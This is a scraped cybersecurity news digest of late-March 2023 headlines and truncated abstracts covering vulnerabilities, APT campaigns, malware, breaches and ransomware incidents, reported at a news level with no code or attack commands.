Patches have been released for a critical security flaw impacting the WooCommerce Payments plugin for WordPress, which is installed on over 500,000 websites. The flaw, if left unresolved, could enable a bad actor to gain unauthorized admin access to impacted stores, the company said in an advisory on March 23, 2023. It impacts versions 4.8.0 through 5.6.1. Put differently, the issue could permit an "unauthenticated attacker to impersonate an administrator and completely take over a website without any user interaction or social engineering required," WordPress security company Wordfence said. The vulnerability appears to reside in a PHP file called "class-platform-checkout-session.php," Sucuri researcher Ben Martin noted. Credited with discovering and reporting the vulnerability is Michael Mazzolini of Swiss penetration testing company GoldNetwork. WooCommerce also said it worked with WordPress to auto-update sites using affected versions of the softwarThe Hacker News
March 24, 2023 – General
Pwn2Own Vancouver 2023 Day 2: Microsoft Teams, Oracle VirtualBox, and Tesla hacked Full Text
Abstract
On the second day of Pwn2Own Vancouver 2023, the organization awarded $475,000 for 10 unique zero-day vulnerabilities. On the second day of Pwn2Own Vancouver 2023, the organization awarded $475,000 for 10 unique zero-day vulnerabilities, bringing...Security Affairs
March 24, 2023 – Vulnerabilities
High-Severity Vulnerabilities Found in WellinTech Industrial Data Historian Full Text
Abstract
Cisco’s Talos threat intelligence and research unit this week disclosed the details of two high-severity vulnerabilities discovered last year in WellinTech’s KingHistorian industrial data historian software.Cyware
March 24, 2023 – APT
SideCopy APT Targets India’s Premier Defense Research Agency Full Text
Abstract
SideCopy APT traditionally uses spear phishing as its method to gain initial entry. Emails in the latest campaign purportedly contain research material about military technologies sent as attachments.Cyware
March 24, 2023 – Breach
User Data Leak at Korean Beauty Platform PowderRoom Impacts One Million People Full Text
Abstract
The Cybernews research team discovered that the South Korean social platform, powderroom.co.kr – which markets itself as the nation’s biggest beauty community – was leaking the private data of a million users.Cyware
March 23, 2023 – APT
Kimsuky Updates its Tactics to Target South Korean Experts Full Text
Abstract
German and South Korean government agencies warned about a new spear-phishing campaign by the North Korean APT, Kimsuky. The campaign targets experts on issues related to the Korean peninsula. Attackers send a spear-phishing email to the targeted victims, asking them to install a malicious Chrome e ...Cyware
March 23, 2023 – Malware
Fake ChatGPT Chrome Browser Extension Caught Hijacking Facebook Accounts Full Text
Abstract
Google has stepped in to remove a bogus Chrome browser extension from the official Web Store that masqueraded as OpenAI's ChatGPT service to harvest Facebook session cookies and hijack the accounts. The "ChatGPT For Google" extension, a trojanized version of a legitimate open source browser add-on, attracted over 9,000 installations since March 14, 2023, prior to its removal. It was originally uploaded to the Chrome Web Store on February 14, 2023. According to Guardio Labs researcher Nati Tal, the extension is propagated through malicious sponsored Google search results that are designed to redirect unsuspecting users searching for "Chat GPT-4" to fraudulent landing pages that point to the fake add-on. Installing the extension adds the promised functionality – i.e., enhancing search engines with ChatGPT – but it also stealthily activates the ability to capture Facebook-related cookies and exfiltrate them to a remote server in an encrypted manner. OncThe Hacker News
March 23, 2023 – Breach
A million at risk from user data leak at Korean beauty platform PowderRoom Full Text
Abstract
South Korean beauty content platform PowderRoom has leaked the personal information of nearly one million people. Established in 2003, PowderRoom is a South Korean beauty content platform connecting 3.5 million members and thousands of beauty brands. It...Security Affairs
March 23, 2023 – APT
Black Magic APT Targets Ukraine with CommonMagic and PowerMagic Full Text
Abstract
Kaspersky researchers have identified cyberattacks targeting government, agriculture, and transportation organizations in Donetsk, Lugansk, and Crimea, conducted by the new Bad Magic APT. The campaign leverages old artifacts created as early as September 2021, along with a previously unseen malicio ...Cyware
March 23, 2023 – Malware
Nexus: A New Rising Android Banking Trojan Targeting 450 Financial Apps Full Text
Abstract
An emerging Android banking trojan dubbed Nexus has already been adopted by several threat actors to target 450 financial applications and conduct fraud. "Nexus appears to be in its early stages of development," Italian cybersecurity firm Cleafy said in a report published this week. "Nexus provides all the main features to perform ATO attacks (Account Takeover) against banking portals and cryptocurrency services, such as credentials stealing and SMS interception." The trojan, which appeared in various hacking forums at the start of the year, is advertised as a subscription service to its clientele for a monthly fee of $3,000. Details of the malware were first documented by Cyble earlier this month. However, there are indications that the malware may have been used in real-world attacks as early as June 2022, at least six months before its official announcement on darknet portals. According to security researcher Rohit Bansal (@0xrb) and confirmed by tThe Hacker News
March 23, 2023 – Malware
Experts published PoC exploit code for Veeam Backup & Replication bug Full Text
Abstract
Researchers released a PoC exploit code for a high-severity vulnerability in Veeam Backup & Replication (VBR) software. Veeam recently addressed a high-severity flaw, tracked as CVE-2023-27532, in Veeam Backup and Replication (VBR) software....Security Affairs
March 23, 2023 – Attack
Skylink hit by hacker attack Full Text
Abstract
M7 Group’s Czech and Slovak operator Skylink has reportedly fallen victim to a hacker attack. Skylink offers DTH and internet TV services in the Czech Republic and Slovakia.Cyware
March 23, 2023 – General
2023 Cybersecurity Maturity Report Reveals Organizational Unpreparedness for Cyberattacks Full Text
Abstract
In 2022 alone, global cyberattacks increased by 38%, resulting in substantial business loss, including financial and reputational damage. Meanwhile, corporate security budgets have risen significantly because of the growing sophistication of attacks and the number of cybersecurity solutions introduced into the market. With this rise in threats, budgets, and solutions, how prepared are industries and countries to effectively address today's cyber risk? CYE's new Cybersecurity Maturity Report 2023 tackles this question by shedding light on the strength of cybersecurity in different sectors, company sizes, and countries. It highlights which industries and countries have the most robust cyber postures and which are lagging, as well as the most prevalent vulnerabilities in today's cyber threat landscape. The analysis is based on two years' worth of data, collected from over 500 organizations in 15 countries, and spanning 11 industries and a range of company sizes. It measures cybersecThe Hacker News
March 23, 2023 – Vulnerabilities
Cisco fixed multiple severe vulnerabilities in its IOS and IOS XE software Full Text
Abstract
Cisco addressed tens of vulnerabilities in its IOS and IOS XE software; six of these issues have been rated ‘high severity’. Cisco published the March 2023 Semiannual IOS and IOS XE Software Security Advisory that addresses several vulnerabilities...Security Affairs
March 23, 2023 – General
Hacktivists Increasingly Claim Targeting of OT Systems Full Text
Abstract
The number of false claims is at times challenging to debunk. However, despite the inaccuracy of most claims, when hacktivist activity targeting OT becomes commonplace, the likelihood of actual and even substantial OT incidents increases.Cyware
March 23, 2023 – Breach
Operation Soft Cell: Chinese Hackers Breach Middle East Telecom Providers Full Text
Abstract
Telecommunication providers in the Middle East are the subject of new cyber attacks that commenced in the first quarter of 2023. The intrusion set has been attributed to a Chinese cyber espionage actor associated with a long-running campaign dubbed Operation Soft Cell based on tooling overlaps. "The initial attack phase involves infiltrating Internet-facing Microsoft Exchange servers to deploy web shells used for command execution," researchers from SentinelOne and QGroup said in a new technical report shared with The Hacker News. "Once a foothold is established, the attackers conduct a variety of reconnaissance, credential theft, lateral movement, and data exfiltration activities." Operation Soft Cell, according to Cybereason, refers to malicious activities undertaken by China-affiliated actors targeting telecommunications providers since at least 2012. The Soft Cell threat actor, also tracked by Microsoft as Gallium, is known to target unpatched intThe Hacker News
March 23, 2023 – Malware
Nexus, an emerging Android banking Trojan targets 450 financial apps Full Text
Abstract
Experts warn of an emerging Android banking trojan dubbed Nexus that was employed in attacks against 450 financial applications. Cybersecurity firm experts from Cleafy warn of an emerging Android banking trojan, named Nexus, that was employed...Security Affairs
March 23, 2023 – Vulnerabilities
Cisco Patches High-Severity Vulnerabilities in IOS Software Full Text
Abstract
Cisco published its semiannual IOS and IOS XE software security advisory bundle, which addresses ten vulnerabilities, including six ‘high-severity’ ones. The most important three security bugs can be exploited remotely to cause a DoS condition.Cyware
March 23, 2023 – Hacker
German and South Korean Agencies Warn of Kimsuky’s Expanding Cyber Attack Tactics Full Text
Abstract
German and South Korean government agencies have warned about cyber attacks mounted by a threat actor tracked as Kimsuky using rogue browser extensions to steal users' Gmail inboxes. The joint advisory comes from Germany's domestic intelligence apparatus, the Federal Office for the Protection of the Constitution (BfV), and South Korea's National Intelligence Service of the Republic of Korea (NIS). The intrusions are designed to strike "experts on the Korean Peninsula and North Korea issues" through spear-phishing campaigns, the agencies noted. Kimsuky, also known as Black Banshee, Thallium, and Velvet Chollima, refers to a subordinate element within North Korea's Reconnaissance General Bureau and is known to "collect strategic intelligence on geopolitical events and negotiations affecting the DPRK's interests." Primary targets of interest include entities in the U.S. and South Korea, particularly singling out individuals working withinThe Hacker News
March 23, 2023 – Breach
Dole discloses data breach after February ransomware attack Full Text
Abstract
Dole Food Company confirmed that threat actors behind the recent ransomware attack had access to employees' data. Dole Food Company is an Irish agricultural multinational corporation; it is one of the world’s largest producers of...Security Affairs
March 23, 2023 – Business
Splashtop Buys Foxpass to Bring Enterprise IAM to the Masses Full Text
Abstract
Remote access provider Splashtop has acquired the server and network access management vendor Foxpass to get better visibility across co-managed and multi-tenant environments.Cyware
March 23, 2023 – General
Pwn2Own Vancouver 2023 Day 1: Windows 11 and Tesla hacked Full Text
Abstract
On the first day of Pwn2Own Vancouver 2023, the organization awarded $375,000 (and a Tesla Model 3) for 12 zero-day flaws. Pwn2Own Vancouver 2023 has begun; this hacking competition has 19 entries targeting nine different targets, including two Tesla...Security Affairs
March 23, 2023 – Business
Backslash Snags $8M Seed Financing for AppSec Tech Full Text
Abstract
The Israeli startup said the financing was provided by StageOne Ventures, First Rays Venture Partners, and D. E. Shaw & Co. A roster of prominent security practitioners and entrepreneurs also joined the round.Cyware
March 22, 2023 – Vulnerabilities
Netgear Orbi router vulnerable to arbitrary command execution Full Text
Abstract
Cisco Talos recently discovered four vulnerabilities in the Netgear Orbi mesh wireless system, including the main hub router and satellite routers that extend the network’s range.Cyware
March 22, 2023 – Government
CISA Alerts on Critical Security Vulnerabilities in Industrial Control Systems Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released eight Industrial Control Systems (ICS) advisories on Tuesday, warning of critical flaws affecting equipment from Delta Electronics and Rockwell Automation. This includes 13 security vulnerabilities in Delta Electronics' InfraSuite Device Master, a real-time device monitoring software. All versions prior to 1.0.5 are affected by the issues. "Successful exploitation of these vulnerabilities could allow an unauthenticated attacker to obtain access to files and credentials, escalate privileges, and remotely execute arbitrary code," CISA said. Top of the list is CVE-2023-1133 (CVSS score: 9.8), a critical flaw that arises from the fact that InfraSuite Device Master accepts unverified UDP packets and deserializes the content, thereby allowing an unauthenticated remote attacker to execute arbitrary code. Two other deserialization flaws, CVE-2023-1139 (CVSS score: 8.8) and CVE-2023-1145The Hacker News
March 22, 2023 – Policy and Law
Enforcement of Cybersecurity Regulations: Part 1 Full Text
Abstract
As government policy moves toward more binding rules for cybersecurity, how should they be enforced? Self-assessment and self-certification are not likely to suffice.Lawfare
March 22, 2023 – Breach
Lionsgate streaming platform with 37m subscribers leaks user data Full Text
Abstract
Entertainment industry giant Lionsgate leaked users' IP addresses and information about what content they watch on its movie-streaming platform, according to research from Cybernews. Original post at https://cybernews.com/security/lionsgate-data-leak/ During...Security Affairs
March 22, 2023 – Malware
Emotet Adopts the Trend for OneNote Infection Full Text
Abstract
Security researcher abel took the wraps off Emotet’s new distribution technique that allows it to propagate through Microsoft OneNote email attachments. The operators have a history of deploying malicious macros on infected systems via Microsoft Word and Excel attachments. This new method of infect ...Cyware
March 22, 2023 – Malware
ScarCruft’s Evolving Arsenal: Researchers Reveal New Malware Distribution Techniques Full Text
Abstract
The North Korean advanced persistent threat (APT) actor dubbed ScarCruft is using weaponized Microsoft Compiled HTML Help (CHM) files to download additional malware. According to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group's continuous efforts to refine and retool its tactics to sidestep detection. "The group is constantly evolving its tools, techniques, and procedures while experimenting with new file formats and methods to bypass security vendors," Zscaler researchers Sudeep Singh and Naveen Selvan said in a new analysis published Tuesday. ScarCruft, also tracked under the names APT37, Reaper, RedEyes, and Ricochet Chollima, has exhibited an increased operational tempo since the start of the year, targeting various South Korean entities for espionage purposes. It is known to be active since at least 2012. Last month, ASEC disclosed a campaign that employedThe Hacker News
March 22, 2023 – Malware
Rogue ChatGPT extension FakeGPT hijacked Facebook accounts Full Text
Abstract
A tainted version of the legitimate ChatGPT extension for Chrome, designed to steal Facebook accounts, has thousands of downloads. Guardio’s security team uncovered a new variant of a malicious Chat-GPT Chrome Extension that was already downloaded...Security Affairs
March 22, 2023 – Breach
NYC Special Needs Students’ Records Found Exposed on Web Full Text
Abstract
Tens of thousands of documents containing personal information of special education students within New York City's public school system were held in an unsecured database exposed to the internet.Cyware
March 22, 2023 – Education
Preventing Insider Threats in Your Active Directory Full Text
Abstract
Active Directory (AD) is a powerful authentication and directory service used by organizations worldwide. With this ubiquity and power comes the potential for abuse. Insider threats carry some of the greatest potential for destruction. Many internal users have over-provisioned access and visibility into the internal network. Insiders' level of access and trust in a network leads to unique vulnerabilities. Network security often focuses on keeping a threat actor out, not on existing users' security and potential vulnerabilities. Staying on top of potential threats means protecting against inside and outside threats. Active Directory Vulnerabilities: From the outside, a properly configured AD domain offers a secure authentication and authorization solution. But with complex social engineering and phishing email attacks, an existing AD user can become compromised. Once inside, threat actors have many options to attack Active Directory. Insecure Devices: With "Bring Your OwnThe Hacker News
March 22, 2023 – Malware
Experts released PoC exploits for severe flaws in Netgear Orbi routers Full Text
Abstract
Cisco Talos researchers published PoC exploits for vulnerabilities in Netgear Orbi 750 series router and extender satellites. Netgear Orbi is a line of mesh Wi-Fi systems designed to provide high-speed, reliable Wi-Fi coverage throughout a home or business....Security Affairs
March 22, 2023 – Ransomware
Trigona Evolves TTPs, Targets Orgs Worldwide Full Text
Abstract
Trigona ransomware, which surfaced in December 2022, targeted at least 15 organizations across different sectors in the U.S., Australia, Italy, France, New Zealand, and Germany. The malware is capable of getting initial access, performing reconnaissance, transferring malware via a remote monitoring ...Cyware
March 22, 2023 – Malware
Rogue NuGet Packages Infect .NET Developers with Crypto-Stealing Malware Full Text
Abstract
The NuGet repository is the target of a new "sophisticated and highly-malicious attack" aiming to infect .NET developer systems with cryptocurrency stealer malware. The 13 rogue packages, which were downloaded more than 160,000 times over the past month, have since been taken down. "The packages contained a PowerShell script that would execute upon installation and trigger a download of a 'second stage' payload, which could be remotely executed," JFrog researchers Natan Nehorai and Brian Moussalli said. While NuGet packages have in the past been found to contain vulnerabilities and be abused to propagate phishing links, the development marks the first-ever discovery of packages with malicious code. Three of the most downloaded packages – Coinbase.Core, Anarchy.Wrapper.Net, and DiscordRichPresence.API – alone accounted for 166,000 downloads, although it's also possible that the threat actors artificially inflated the download counts using boThe Hacker News
March 22, 2023 – General
ENISA: Ransomware became a prominent threat against the transport sector in 2022 Full Text
Abstract
The European Union Agency for Cybersecurity (ENISA) published its first cyber threat landscape report for the transport sector. A new report published by the European Union Agency for Cybersecurity (ENISA) analyzes threats and incidents in the transport...Security Affairs
March 22, 2023 – Education
How to combat hardware Trojans by detecting microchip manipulations Full Text
Abstract
Researchers from Ruhr University Bochum, Germany, and the Max Planck Institute for Security and Privacy (MPI-SP) are pioneering innovative detection techniques to combat these hardware Trojans.Cyware
March 22, 2023 – Malware
NAPLISTENER: New Malware in REF2924 Group’s Arsenal for Bypassing Detection Full Text
Abstract
The threat group tracked as REF2924 has been observed deploying previously unseen malware in its attacks aimed at entities in South and Southeast Asia. The malware, dubbed NAPLISTENER by Elastic Security Labs, is an HTTP listener programmed in C# and is designed to evade "network-based forms of detection." REF2924 is the moniker assigned to an activity cluster linked to attacks against an entity in Afghanistan as well as the Foreign Affairs Office of an ASEAN member in 2022. The threat actor's modus operandi suggests overlaps with another hacking group dubbed ChamelGang, which was documented by Russian cybersecurity company Positive Technologies in October 2021. Attacks orchestrated by the group are said to have exploited internet-exposed Microsoft Exchange servers to deploy backdoors such as DOORME, SIESTAGRAPH, and ShadowPad. DOORME, an Internet Information Services (IIS) backdoor module, provides remote access to a contested network and executes additThe Hacker News
March 22, 2023 – Criminals
BreachForums current Admin Baphomet shuts down BreachForums Full Text
Abstract
Baphomet, the current administrator of BreachForums, announced that the popular hacking forum has been officially taken down. U.S. law enforcement last week arrested a US man who goes online by the moniker “Pompompurin”; the US citizen is accused...Security Affairs
March 22, 2023 – APT
Winter Vivern APT Targets European Government Entities With Aperetif Full Text
Abstract
SentinelOne spotted the Winter Vivern APT group targeting Polish government agencies, Indian government entities, the Ukraine Ministry of Foreign Affairs, and the Italy Ministry of Foreign Affairs in cyberespionage campaigns since 2021.Cyware
March 22, 2023 – Criminals
BreachForums Administrator Baphomet Shuts Down Infamous Hacking Forum Full Text
Abstract
In a sudden turn of events, Baphomet, the current administrator of BreachForums, said in an update on March 21, 2023, that the hacking forum has been officially taken down but emphasized that "it's not the end." "You are allowed to hate me, and disagree with my decision but I promise what is to come will be better for us all," Baphomet noted in a message posted on the BreachForums Telegram channel. The shutdown is suspected to have been prompted by suspicions that law enforcement may have obtained access to the site's configurations, source code, and information about the forum's users. The development follows the arrest of its administrator Conor Brian Fitzpatrick (aka "pompompurin"), who has been charged with a single count of conspiracy to commit access device fraud. Over the past few months, BreachForums filled the void left by RaidForums last year, becoming a lucrative destination to purchase and sell stolen databases from variouThe Hacker News
March 22, 2023 – Breach
Independent Living Systems data breach impacts more than 4M individuals Full Text
Abstract
US health services company Independent Living Systems (ILS) discloses a data breach that impacted more than 4 million individuals. US health services company Independent Living Systems (ILS) disclosed a data breach that exposed personal and medical...Security Affairs
March 21, 2023 – Phishing
Threat actors are experimenting with QR codes Full Text
Abstract
Data collected by the HP Threat Research team shows that from Q2 2022, attackers have been diversifying their techniques to find new ways to breach devices and steal data using QR code scam campaigns.Cyware
March 21, 2023 – Outage
New ‘Bad Magic’ Cyber Threat Disrupts Ukraine’s Key Sectors Amid War Full Text
Abstract
Amid the ongoing war between Russia and Ukraine, government, agriculture, and transportation organizations located in Donetsk, Lugansk, and Crimea have been attacked as part of an active campaign that drops a previously unseen, modular framework dubbed CommonMagic. "Although the initial vector of compromise is unclear, the details of the next stage imply the use of spear phishing or similar methods," Kaspersky said in a new report. The Russian cybersecurity company, which detected the attacks in October 2022, is tracking the activity cluster under the name "Bad Magic." Attack chains entail the use of booby-trapped URLs pointing to a ZIP archive hosted on a malicious web server. The file, when opened, contains a decoy document and a malicious LNK file that culminates in the deployment of a backdoor named PowerMagic. Written in PowerShell, PowerMagic establishes contact with a remote server and executes arbitrary commands, the results of which are exfiltraThe Hacker News
March 21, 2023 – General
Call for Papers: Cybersecurity Law and Policy Scholars Conference 2023 Full Text
Abstract
The third annual Cybersecurity Law and Policy Scholars Conference (CLPSC) will take place at the Fletcher School of Law & Diplomacy at Tufts University on September 29-30, 2023.Lawfare
March 21, 2023 – APT
New Bad Magic APT used CommonMagic framework in the area of Russo-Ukrainian conflict Full Text
Abstract
Threat actors are targeting organizations located in Donetsk, Lugansk, and Crimea with a previously undetected framework dubbed CommonMagic. In October 2022, Kaspersky researchers uncovered a malware campaign aimed at infecting government, agriculture...Security Affairs
March 21, 2023 – Vulnerabilities
Organizations Notified of Remotely Exploitable Vulnerabilities in Aveva HMI, SCADA Products Full Text
Abstract
Organizations that use human-machine interface (HMI) and supervisory control and data acquisition (SCADA) products from UK-based industrial software maker Aveva have been informed about the existence of several potentially serious vulnerabilities.Cyware
March 21, 2023 – Denial Of Service
New ShellBot DDoS Malware Variants Targeting Poorly Managed Linux Servers Full Text
Abstract
Poorly managed Linux SSH servers are being targeted as part of a new campaign that deploys different variants of a malware called ShellBot. "ShellBot, also known as PerlBot , is a DDoS Bot malware developed in Perl and characteristically uses IRC protocol to communicate with the C&C server," AhnLab Security Emergency response Center (ASEC) said in a report. ShellBot is installed on servers that have weak credentials, but only after threat actors make use of scanner malware to identify systems that have SSH port 22 open. A list of known SSH credentials is used to initiate a dictionary attack to breach the server and deploy the payload, after which it leverages the Internet Relay Chat ( IRC ) protocol to communicate with a remote server. This encompasses the ability to receive commands that allows ShellBot to carry out DDoS attacks and exfiltrate harvested information. ASEC said it identified three different ShellBot versions – LiGhT's Modded perlbot v2, DDoSThe Hacker News
March 21, 2023 – Botnet
New ShellBot bot targets poorly managed Linux SSH Servers Full Text
Abstract
New ShellBot DDoS bot malware, aka PerlBot, is targeting poorly managed Linux SSH servers, ASEC researchers warn. AhnLab Security Emergency response Center (ASEC) discovered a new variant of the ShellBot malware that was employed in a campaign that...Security Affairs
March 21, 2023 – General
The Role of Finance Departments in Cybersecurity Full Text
Abstract
A company’s finance department holds the company’s crown jewels: They ensure financial transactions and systems are secure. The finance department is a key component of a company’s overall security.Cyware
March 21, 2023 – General
The Best Defense Against Cyber Threats for Lean Security Teams Full Text
Abstract
H0lyGh0st, Magecart, and a slew of state-sponsored hacker groups are diversifying their tactics and shifting their focus to… You. That is, if you're in charge of cybersecurity for a small-to-midsize enterprise (SME). Why? Bad actors know that SMEs typically have a smaller security budget, less infosec manpower, and possibly weak or missing security controls to protect their data and infrastructure. So, how can you prepare for the imminent onslaught from new and emerging threat groups? You need a plan. Start with the NIST Cyber Security Framework The good news is you don't have to create your security strategy from scratch. The National Institute of Standards and Technology Cyber Security Framework (NIST CSF) is one of the most respected and widely used standards in the world. While originally designed for critical infrastructure industries, the NIST CSF is flexible enough for organizations of all sizes, sectors, and maturities to use in large part because the frameworThe Hacker News
March 21, 2023 – General
2022 Zero-Day exploitation continues at a worrisome pace Full Text
Abstract
Experts warn that 55 zero-day vulnerabilities were exploited in attacks carried out by ransomware and cyberespionage groups in 2022. Cybersecurity firm Mandiant reported that ransomware and cyberespionage groups exploited 55 zero-day flaws in attacks...Security Affairs
March 21, 2023 – Business
Aembit Scores $16.6M Seed Funding for Workload IAM Technology Full Text
Abstract
The Maryland-based cybersecurity company said the seed-stage financing was provided by Ballistic Ventures and Ten Eleven Ventures, two firms active in funding cybersecurity companies.Cyware
March 21, 2023 – General
From Ransomware to Cyber Espionage: 55 Zero-Day Vulnerabilities Weaponized in 2022 Full Text
Abstract
As many as 55 zero-day vulnerabilities were exploited in the wild in 2022, with most of the flaws discovered in software from Microsoft, Google, and Apple. While this figure represents a decrease from the year before, when a staggering 81 zero-days were weaponized, it still represents a significant uptick in recent years of threat actors leveraging unknown security flaws to their advantage. The findings come from threat intelligence firm Mandiant, which noted that desktop operating systems (19), web browsers (11), IT and network management products (10), and mobile operating systems (six) accounted for the most exploited product types. Of the 55 zero-day bugs, 13 are estimated to have been abused by cyber espionage groups, with four others exploited by financially motivated threat actors for ransomware-related operations. Commercial spyware vendors were linked to the exploitation of three zero-days. Among state-sponsored groups, those attributed to China have emerged as the mostThe Hacker News
March 21, 2023 – Breach
Ferrari confirms data breach after receiving a ransom demand from an unnamed extortion group Full Text
Abstract
Ferrari disclosed a data breach after receiving a ransom demand from an unnamed extortion group that gained access to some of its IT systems. Ferrari disclosed a data breach after it received a ransom demand from an unnamed extortion group that breached...Security Affairs
March 21, 2023 – Business
Mastercard acquires Baffin Bay Networks to improve customer security Full Text
Abstract
Baffin Bay Networks, based in Sweden, adds to Mastercard’s multi-layered approach to cybersecurity and helps to stop attacks, while mitigating exposure to risk across the ecosystem.Cyware
March 21, 2023 – Cryptocurrency
Hackers Steal Over $1.6 Million in Crypto from General Bytes Bitcoin ATMs Using Zero-Day Flaw Full Text
Abstract
Bitcoin ATM maker General Bytes disclosed that unidentified threat actors stole cryptocurrency from hot wallets by exploiting a zero-day security flaw in its software. "The attacker was able to upload his own java application remotely via the master service interface used by terminals to upload videos and run it using 'batm' user privileges," the company said in an advisory published over the weekend. "The attacker scanned the Digital Ocean cloud hosting IP address space and identified running CAS services on ports 7741, including the General Bytes Cloud service and other GB ATM operators running their servers on Digital Ocean," it further added. The company said that the server to which the malicious Java application was uploaded was by default configured to start applications present in the deployment folder ("/batm/app/admin/standalone/deployments/"). In doing so, the attack allowed the threat actor to access the database; read and decryThe Hacker News
March 21, 2023 – Criminals
Crooks stole more than $1.5M worth of Bitcoin from General Bytes ATMs Full Text
Abstract
Cryptocurrency ATM maker General Bytes suffered a security breach over the weekend, the hackers stole $1.5M worth of cryptocurrency. Cryptocurrency ATM manufacturer General Bytes suffered a security incident that resulted in the theft of $1.5M worth...Security Affairs
March 21, 2023 – APT
New APT Found Actively Using PowerMagic Backdoor and CommonMagic Framework Full Text
Abstract
In October 2022, Kaspersky researchers identified an active infection of government, agriculture, and transportation organizations located in the Donetsk, Lugansk, and Crimea regions.Cyware
March 21, 2023 – Breach
GOP lawmakers want additional details on CMS subcontractor breach timeline Full Text
Abstract
Details of Medicare beneficiaries that were exposed during the incident included names, addresses, dates of birth, phone numbers, social security numbers, and Medicare Beneficiary Identifiers.Cyware
March 20, 2023 – Attack
TeamTNT Allegedly Connected to SCARLETEEL Decoy Attack Full Text
Abstract
The SCARLETEEL sophisticated hacking operation, which targets Kubernetes hosted on Amazon to steal confidential proprietary data, is also suspected to have a TeamTNT touch. Despite all the similarities, researchers could not connect the two malware with full confidence. According to them, it is possible...Cyware
March 20, 2023 – Malware
New DotRunpeX Malware Delivers Multiple Malware Families via Malicious Ads Full Text
Abstract
A new piece of malware dubbed dotRunpeX is being used to distribute numerous known malware families such as Agent Tesla , Ave Maria , BitRAT , FormBook , LokiBot , NetWire , Raccoon Stealer , RedLine Stealer , Remcos , Rhadamanthys , and Vidar . "DotRunpeX is a new injector written in .NET using the Process Hollowing technique and used to infect systems with a variety of known malware families," Check Point said in a report published last week. Said to be in active development, dotRunpeX arrives as a second-stage malware in the infection chain, often deployed via a downloader (aka loader) that's transmitted through phishing emails as malicious attachments. Alternatively, it's known to leverage malicious Google Ads on search result pages to direct unsuspecting users searching for popular software such as AnyDesk and LastPass to copycat sites hosting trojanized installers. The latest DotRunpeX artifacts, first spotted in October 2022, add an extra oThe Hacker News
March 20, 2023 – Vulnerabilities
Acropalypse flaw in Google Pixel’s Markup tool allowed the recovery of edited images Full Text
Abstract
The Acropalypse flaw in the Markup tool of Google Pixel allowed the partial recovery of edited or redacted screenshots and images. Security researchers Simon Aarons and David Buchanan have discovered a vulnerability, named 'Acropalypse,' in the Markup...Security Affairs
March 20, 2023 – Criminals
Killnet Aggressively Targets Healthcare Organizations Full Text
Abstract
KillNet, a cybercriminal collective with ties to Russia, was spotted targeting Microsoft Azure-hosted healthcare apps for more than three months. The highest number of these attacks were launched in February, targeting hospitals, pharma, life science, healthcare insurance, and health services in mo...Cyware
March 20, 2023 – Breach
Mispadu Banking Trojan Targets Latin America: 90,000+ Credentials Stolen Full Text
Abstract
A banking trojan dubbed Mispadu has been linked to multiple spam campaigns targeting countries like Bolivia, Chile, Mexico, Peru, and Portugal with the goal of stealing credentials and delivering other payloads. The activity, which commenced in August 2022, is currently ongoing, Ocelot Team from Latin American cybersecurity firm Metabase Q said in a report shared with The Hacker News. Mispadu (aka URSA) was first documented by ESET in November 2019, describing its ability to perpetrate monetary and credential theft and act as a backdoor by taking screenshots and capturing keystrokes. "One of their main strategies is to compromise legitimate websites, searching for vulnerable versions of WordPress, to turn them into their command-and-control server to spread malware from there, filtering out countries they do not wish to infect, dropping different type of malware based on the country being infected," researchers Fernando García and Dan Regalado said. It's alsoThe Hacker News
March 20, 2023 – Hacker
Threat actors abuse Adobe Acrobat Sign to distribute RedLine info-stealer Full Text
Abstract
Threat actors are abusing the legitimate Adobe Acrobat Sign service to distribute the RedLine information stealer. Avast researchers reported that threat actors are abusing the legitimate Adobe Acrobat Sign service to distribute the RedLine information...Security Affairs
March 20, 2023 – Breach
After Data Breaches, Lawsuits Hit Two Arkansas Hospitals Full Text
Abstract
Since January, four lawsuits have been filed against both Howard Memorial Hospital of Nashville and against the Mena Hospital Commission, which operates as the Mena Regional Health System.Cyware
March 20, 2023 – Breach
New Cyber Platform Lab 1 Decodes Dark Web Data to Uncover Hidden Supply Chain Breaches Full Text
Abstract
2022 was the year when inflation hit world economies, except in one corner of the global marketplace – stolen data. Ransomware payments fell by over 40% in 2022 compared to 2021. More organisations chose not to pay ransom demands, according to findings by blockchain firm Chainalysis. Nonetheless, stolen data has value beyond a price tag, and in risky ways you may not expect. Evaluating stolen records is what Lab 1, a new cyber monitoring platform, believes will make a big difference for long-term cybersecurity resilience. Think of data value this way: stolen credentials can become future phishing attacks; logins for adult websites are potential extortion attempts; travel and location data are a risk to VIPs and senior leadership; and so on. Hackers could retaliate for non-payment by simply posting their loot to forums where the data will be available for further enrichment and exploitation. Shining a light on dark places: even though your company may not have suffered a diThe Hacker News
March 20, 2023 – Malware
Emotet is back after a three-month hiatus Full Text
Abstract
The infamous Emotet malware is back after a short hiatus, threat actors are spreading it via Microsoft OneNote email attachments. The Emotet malware returns after a three-month hiatus and threat actors are distributing it via Microsoft OneNote email...Security Affairs
March 20, 2023 – Outage
Bitcoin ATM Maker General Bytes Shuts Cloud Service After Security Breach Full Text
Abstract
In a patch release bulletin, General Bytes warned that a hacker has been able to remotely upload and run a Java application via the master service interface into its terminals aimed at stealing user information and sending funds from hot wallets.Cyware
March 20, 2023 – Ransomware
Researchers Shed Light on CatB Ransomware’s Evasion Techniques Full Text
Abstract
The threat actors behind the CatB ransomware operation have been observed using a technique called DLL search order hijacking to evade detection and launch the payload. CatB, also referred to as CatB99 and Baxtoy, emerged late last year and is said to be an "evolution or direct rebrand" of another ransomware strain known as Pandora based on code-level similarities. It's worth noting that the use of Pandora has been attributed to Bronze Starlight (aka DEV-0401 or Emperor Dragonfly), a China-based threat actor that's known to employ short-lived ransomware families as a ruse to likely conceal its true objectives. One of the key defining characteristics of CatB is its reliance on DLL hijacking via a legitimate service called Microsoft Distributed Transaction Coordinator ( MSDTC ) to extract and launch the ransomware payload. "Upon execution, CatB payloads rely on DLL search order hijacking to drop and load the malicious payload," SentinelOne researcThe Hacker News
March 20, 2023 – Attack
Play ransomware gang hit Dutch shipping firm Royal Dirkzwager Full Text
Abstract
Dutch maritime logistics company Royal Dirkzwager suffered a ransomware attack, the company was hit by the Play ransomware gang. The Play ransomware group hit the Dutch maritime logistics company Royal Dirkzwager. Royal Dirkzwager is specialized...Security Affairs
March 20, 2023 – Breach
Orlando Family Physicians data breach class action settlement Full Text
Abstract
